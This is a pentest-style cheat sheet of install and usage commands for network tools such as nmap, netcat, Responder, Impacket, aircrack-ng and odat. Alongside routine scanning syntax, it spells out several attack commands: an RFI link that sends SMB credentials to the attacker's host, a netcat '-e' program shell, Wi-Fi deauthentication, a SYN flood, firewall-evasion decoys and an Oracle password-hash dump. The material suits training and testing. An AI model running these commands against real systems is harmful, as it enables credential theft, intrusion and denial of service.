Tools and Utilities

Here are some tools and utilities commonly used for practices related to networks:

OpenVPN

VPN system that implements both client and server applications, including a command-line utility

Commands

Installation

sudo apt install openvpn

Connect to a VPN

sudo openvpn $ovpnfile

SmbClient

Tool for accessing a server using the SMB protocol

Commands

Installation

sudo apt install smbclient

Connect and interact with an SMB server

smbclient -I $IP    #Connect to server
smbclient -L $IP -N #List elements on the server without providing a password 
smbclient //$IP/$ShareName       #Acces to a shared instance
smbclient \\\\$IP\\$ShareName    #Alternative
smbclient //$IP/$ShareName $username #Connect indicating a username
smbclient //$IP/$ShareName -c "$comand" #Execute a command
smb: \>                 #Text based interface
smb: \> get $filename   #Download a file
smb: \> put $filename   #Upload a file
smb: \> exit            #Close connection

Responder

Help in the passive obtention of credentials by mounting an SMB server on the web that intercepts internal communication from this protocol

Commands

Install

sudo apt install responder

Change the configuration file

sudo nano /usr/share/responder/Responder.conf #Installed here by default

Initialize tool

sudo responder -I $networkinterface

If we get an error in any port, we have to update the Responder.conf file and set to off the value of the service related to that port

Abuse an RFI on a web page to intercept SMB credentials

http://$url/$query?$value=//$myip/somefile

If the process works, we will see the server catch the credentials

Tcpdump

Command-line packet analyzer tool used to capture and inspect network traffic sent via the TPC protocol in real-time

Commands

Install

sudo apt install tcpdump

Set up a listener

sudo tcpdump -i $networkInterface port $port

Netcat

Unix utility that reads and writes data across network connections
Can act as a server or as a listener
By default makes a TCP connection but can be used with TCP or UDP protocol

Commands

Install

sudo apt install netcat-traditional

Start netcat

nc $hostname $port
nc -n $IP $port        #Use only numeric IP no DNS
nc -v $hostname $port  #Verbose Output

Start in listen mode

nc -l -p $port
nc -nvlp $port     #The best way to make it

Make a file transmission

nc -nvlp $port > $incomingfile  #From listening side
nc -n -v -p $port < $file       #From sender side

#From the listening side
$incomingfile -h    #Check if the transmission was correct

Execute a program on the server

nc -l -p $port -e $program

Interact with network protocols

#Example
sudo nc $ip 80 #We connect to HTTP service

#We send a petition
GET / HTTP/1.1
host: netcat      #After finishing, hit enter to send

To make a line jump is necessary to press Shift+Enter

Nmap

An open-source tool for network exploration and security auditing that works as a network mapper

Scan types

SYN scans are also known as Half-open or Stealth. They are stealthier than Connect scans
The difference between Connect and SYN scans is that Connect performs a full three-way handshake with the target. Instead of that, SYN scans send back an RST packet after receiving a SYN/ACK
The UDP scans are slower than TCP scans
In UDP scans, if the port is open, it will send no response and will be marked as open|filtered. If there's a response will be marked as open. If it's closed, the target responds with an ICMP packet containing a message that the port is unreachable
NULL, FIN, Xmas, and ACK scans are stealthier than SYN or UDP scans, usually used for firewall evasion
NULL scans send a TCP request with no flags, the target host responds with RST if the port is closed
FIN scans send a TCP request with the FIN flag, used to gracefully close an active connection. The target host responds with RST if the port is closed
Xmas scans send a malformed TCP packet, and the target host responds with RST if the port is closed
Microsoft Windows may respond to a NULL, FIN, or Xmas scan with an RST for every port

NSE

The Nmap Scripting Engine is a library of scripts written in Lua that can be used for scanning vulnerabilities and automating exploits for them.
Every script has a category related to its use scenario
By default, Nmap stores scripts in /usr/share/nmap/scripts/script.db

Port State

Open: This indicates that the connection to the scanned port has been established
Closed: TCP protocol indicates that the packet we received back contains an RST flag. Can be used to determine if a target is alive or not
Filtered: Cannot correctly identify whether the scanned port is open or closed because it got no response or an error code from the target
Unfiltered: Only occurs during the TCP-ACK scan and means that the port is accessible, but it cannot be determined if it's open or closed
Open|filtered: Didn't get a response, so a firewall or packet filter could be protecting the port
Closed|filtered: Only occurs in the IP ID idle scans, indicating it was impossible to determine if a port is closed or filtered by a firewall

Commands

Install

sudo apt install nmap

Basic scans

nmap $scantype $options $target #General syntax
nmap $ip  #Scan an IP
nmap $domain  #Scan an IP using the domain
nmap $ip1 $ip2  # Scan some IPs
nmap x.x.x.$range1-$range2 #Scan a range of IPs
nmap x.x.x.x/$mask  #Scan using CIDR notation
nmap -iL $inputfile #Scan using the IPs from a list
nmap -iR $number #Scan random hosts
nmap --exclude $ip  #Scan excluding an specific IP
nmap --excludefile $file #Scan excluding the IPs from a list

TCP scan

nmap -sT $target  #TCP Connect scan, default if run without sudo
nmap -sS $target  #TCP SYN scan, default if run with sudo
nmap -sN $target  #TCP Null scan, good for firewall evasion
nmap -sF $target  #TCP FIN scan, good for firewall evasion
nmap -sX $target  #TCP Xmas scan, good for firewall evasion
nmap -sA $target  #TCP ACK scan, good for firewall evasion

UDP scan

nmap -sU $target

Select which port scan

nmap -p $port $target
nmap -p $port-port $target   #Select a range of ports
nmap -p- $target             #Scan all ports
nmap --top-ports $numberofports $target   #Specify the most common ports
nmap -F $target   #Scan the 100 most common ports

Scan without checking if the target is alive

nmap -Pn $target #Don't ping a port to confirm if it is alive
nmap --disable-arp-ping $target #Don't ping a port via ARP

Only make host discovery

sudo nmap -sn $target
sudo nmap -sn -PR $target #Only ARP scan
sudo nmap -sn -PE $target #Make ICMP echo request
sudo nmap -sn -PP $target #Make ICMP timestamp request
sudo nmap -sn -PM $target #Make address mask request
sudo nmap -sn -PS $ports $target #Use TCP SYN ping
sudo nmap -sn -PA $ports $target #Use TCP ACK ping
sudo nmap -sn -PU $ports $target #Use UDP ping

If ICMP scans return MAC addresses, it means the hosts are in the same subnet

DNS resolution

sudo nmap -n $target #Don't use reverse DNS
sudo nmap -R $target #Use reverse DNS even with offline hosts

Detect OS

nmap -O $target

Get the versions of the services running

nmap -sV $target

List hosts to be scanned without scanning them

nmap -sL $targets

Increase the verbosity level of the output

nmap -v $target
nmap -vv $target      #Level 2 verbosity, MOST recommended
nmap -vvv $target     #Level 3 verbosity

Specified Output Format

nmap -oN $target  #Normal output
nmap -oX $target  #XML Format
nmap -oG $target  #Grepable Format
nmap -oA $target  #All 3 Formats at once

Increase the speed the scan runs

nmap -T $timinglevel $target
nmap --min-rate $number $target #Specify the numbers of sent packets per second

This mode is louder than normal

Use scripts from the NSE library

nmap -sC $target    #Script scan
nmap --script=$scriptfile  $target
nmap --script=$category  $target  #Active all scripts in the category
nmap -p $port --script=$script --script-args $script.$arg='$argvalue' #Pass arguments to a script
sudo nmap --script-updatedb    #Update script database
grep $keyword /usr/share/nmap/scripts/script.db    #Search scripts using grep
ls -l /usr/share/nmap/scripts/*$keyword*           #Search scripts using ls
find / -type f -name ftp* 2>/dev/null | grep scripts #Search scripts using find
#Common scripts
nmap $IP -p445 --script=smb-enum-users.nse    #Enumerate SMB users
nmap $IP -p445 --script=smb-enum-groups.nse   #Enumerate SMB groups
nmap $IP -p445 --script smb-enum-shares.nse   #Enumerate SMB shares
nmap $IP -p445 --script smb-enum-processes.nse #Enumerate SMB processes
nmap $IP --script=http-enum                    #Enumerate HTTP services
nmap -sVC -p21 $IP --script=trace              #Enumerate FTP services
nmap $IP -p25 --script=smtp-commands #List available commands on an SMTP server
nmap $IP -p25 --script=smtp-open-relay #identify an SMTP server as an open relay

Fragment packets sent in a scan

nmap $target -f   
nmap $target -mpu $number   #Specify packet's length

The length of packets must be a multiple of 8

Specify the delay between packets sent

nmap $target --scan-delay $number ms

Generate an invalid checksum for packets

nmap $target --badsum

Append an arbitrary length of random data to the end of packets

nmap $target --data-length  $number

Specify the number of retries if a packet gets dropped or blocked

nmap $target --max-retries $number

For firewall evasion

nmap $target -Pn -n -S $myIP -e $interface #Use different Source IP
nmap $target -Pn -n --disable-arp-ping -D RND:$number $target #Use Decoys to vary between random IPs
nmap $target -Pn -n --disable-arp-ping --source-port 53 #Use DNS service as proxy

ARP-Scan

A tool for making host discovery via the ARP protocol
Only devices in the same subnet can be discovered

Commands

Install

sudo apt install arp-scan

Scan options

arp-scan $tagetRange
arp-scan -l                           #Scan local network
arp-scan $tagetRange -I $netInterface #Specify which network interface to use

Masscan

A tool for making port scanning, which is optimized for speed, making it particularly useful for large-scale scans

Commands

Install

sudo apt install masscan

Scan options

masscan $targetRange -p $ports
masscan $targetRange ‐‐top-ports $number #Specify number of most used ports

Docker

An open-source platform that allows building, packaging, and running applications in isolated environments called containers

Commands

Install

sudo apt install docker-ce docker-ce-cli containerd.io
sudo apt install docker-compose-plugin #Install docker-compose

Manage containers and images

sudo docker rm $containerID #Delete a container
sudo docker build . #Build an image from a Dockerfile in the actual folder
sudo docker image ls #List all installed images
sudo docker image rm $imageID #Delete a installed image
sudo docker container ls        #List all running containers
sudo docker run $containerID    #Run container using ID
sudo docker run $containerName  #Run container using Name
sudo docker run $containerName --rm #Run container but deleted when done
sudo docker run $containerName -p $hostPort:$containerPort #Specificate run ports
sudo docker container stop $containerID #Stop a running container
sudo docker compose up -d #Use .yml file to run various containers in the background

onesixtyone

An SNMP scanner which is used to brute force the community string names

Commands

Install

sudo apt install onesixtyone

Usage

onesixtyone -c $dictionary $IP

xfreerdp

An open-source implementation of the RDP protocol

Commands

Install

sudo apt install freerdp2-x11

Usage

xfreerdp /v:$host #Conenct to a remote machine
xfreerdp /v:$host /u:$username #Connect as a user without providing a password
xfreerdp /v:$host /u:$username /p:$password #Connect as a user providing password

Rsync

Command-line tool for fast, flexible, and efficient file and directory synchronization and transfer between two locations

Commands

Install

sudo apt install rsync

Usage

rsync $IP #Connect to the remote service
rsync --list-only $IP #Just list the contents
rsync 10.129.197.128:: #When the target is using a daemon instead of SSH
rsync --list-only $IP::$foldername #List content fo a folder
rsync $IP::$foldername/$filename $localroute #Transfer a shared file

Impacket

A collection of Python classes for working with network protocols

Commands

Installation

sudo apt install python3-impacket

Use of scripts

sudo impacket-$scriptname $options
#Common scripts
sudo impacket-mssqlclient  $hostname/$user@$ip #Connect to MS SQL server
sudo impacket-mssqlclient  $hostname/$user@$ip -windows-auth #Use Windows authentication to connect to MS SQL server
sudo impacket-psexec $username@$IP #Connect to the network service of a host
sudo impacket-samrdump $IP #Bruteforce SMB user RDIs
sudo impacket-wmiexec $username:"$password"@$IP "$hostname" #Chech WMI protocol

Scapy

Powerful interactive packet manipulation library written in Python, used to forge or decode packets of a wide number of protocols, send, capture them, match requests and replies, and much more

Commands

Install

pip install scapy

Usage

sudo scapy #Enter interactive mode
>>> send(IP(dst="$IP")/ICMP()/"$Payload") #Send a ICMP package
>>> ls() #List all available formats and protocols
>>> ls($Protocol) #List all options and fields of a protocol or packet format
>>> explore() #Navigate Scapy layers and protocols
>>> explore($Protocol) #Navigate a specific protocol or packet format

Tshark

A packet capture tool used to capture ICMP packets. Comes by default in the Wireshark tool packet

Commands

Install

sudo apt install wireshark

Usage

sudo tshark host $IP

Aircrack-ng

Wireless security toolset used for monitoring, attacking, testing, and cracking Wi-Fi networks

Commands

Install

sudo apt install aircrack-ng

Usage

airmon-ng start $NIC $channel    #Start monitoring
airodump-ng $NIC                 #Sniff wireless packets
aireplay-ng -0 0 -a $MAC $NIC    #Do de-authentication attack

rpcclient

Central tool to realize operational and work-sharing structures in networks and client-server architectures, useful for the enumeration of the SMB protocol

Commands

Install

sudo apt install rpcclient

Usage

rpcclient -U "$username" $IP # Conect to a host
rpcclient -U "" $IP          # Connect anonymously
rpcclient $> srvinfo	     # Get server information.
rpcclient $> enumdomains     # Enumerate all deployed domains
rpcclient $> querydominfo    # Get domain, server, and user information
rpcclient $> netshareenumall # Enumerate all available shares
rpcclient $> netsharegetinfo $share #Provide information about a share
rpcclient $> enumdomusers    # Enumerate all domain users
rpcclient $> queryuser $userID # Provide information about a user
rpcclient $> querygroup $groupID # Provide information about a user

smbmap

Security tool used for enumerating and interacting with SMB shares on a network

Commands

Install

sudo apt install smbmap

Usage

smbmap -H $IP

CrackMapExec

Powerful post-exploitation tool used for network reconnaissance, credential validation, and lateral movement in Windows Active Directory (AD) environments

Commands

Install

sudo apt install crackmapexec

Usage

crackmapexec smb $IP --shares -u '$username' -p '$password' #Enumerate
crackmapexec smb $IP --shares -u '' -p '' #Enumerate anonymously

smtp-user-enum

A tool for making user enumeration for the SMTP protocol

Commands

Install

sudo apt install smtp-user-enum

Usage

smtp-user-enum -M $smtpCommand -U $usersFile -t $IP

#Example
smtp-user-enum -M VRFY -U $wordlist -t $IP -w 15 -v

snmpwalk

A tool for getting information about the community string for an SNMP protocol

Commands

Install

sudo apt install snmpwalk

Usage

snmpwalk -v2c -c public $IP

snmp-check

Utility for scanning resources via the SNMP protocol

Commands

Install

sudo apt install snmp-check

Usage

snmp-check $IP

odat

Oracle Database Attacking Tool, an open-source penetration testing tool that tests the security of Oracle databases remotely

Commands

Install the tool and required components using the following script

Oracle_Tools.sh

#!/bin/bash

sudo apt-get install libaio1 python3-dev alien -y
git clone https://github.com/quentinhardy/odat.git
cd odat/
git submodule init
git submodule update
wget https://download.oracle.com/otn_software/linux/instantclient/2112000/instantclient-basic-linux.x64-21.12.0.0.0dbru.zip
unzip instantclient-basic-linux.x64-21.12.0.0.0dbru.zip
wget https://download.oracle.com/otn_software/linux/instantclient/2112000/instantclient-sqlplus-linux.x64-21.12.0.0.0dbru.zip
unzip instantclient-sqlplus-linux.x64-21.12.0.0.0dbru.zip
export LD_LIBRARY_PATH=instantclient_21_12:$LD_LIBRARY_PATH
export PATH=/home/kali/Downloads/odat/instantclient_21_12:$PATH
sudo apt install python3-cx-oracle -y
sudo apt-get install python3-scapy -y
sudo apt install python3-colorlog python3-termcolor python3-passlib python3-libnmap -y
sudo apt-get install build-essential libgmp-dev -y
sudo apt install python3-pycryptodome -y
sed -i '9s/.*/from Cryptodome.Cipher import AES/' CVE_2012_3137.py

The first time running odat there will be some errors, but it's normal and won't appear later

Usage

./odat.py -h #Get help many, use to confirm installation was successful
./odat.py all -s $IP #Scan target using all modules
./sqlplus $User/$Password@$IP/$SIDfound #Log in as a user
./sqlplus $User/$Password@$IP/$SIDfound as sysdba #Log as System Database Admin

#Once inside the database
SQL> select table_name from all_tables; #Get table names
SQL> select * from user_role_privs; #Check the privileges of the user
SQL> select name, password from sys.user$; #Get passwords from users

vnstat

Lightweight command-line network traffic monitoring that tracks bandwidth usage per network interface using data from the kernel

Commands

Install

sudo apt install vnstat

Usage

vnstat -l -i $interface

hping

A powerful command-line network tool used primarily for packet crafting and analysis, which allows sending custom TCP/IP packets and observing the responses

Commands

Install

sudo apt install hping

Usage

hping3 -S -p 80 $Domain #Ping using TCP instead of ICMP
hping3 --flood -S -p 80 $Domain #Make a DoS test with SYN packets

Last updated 6 months ago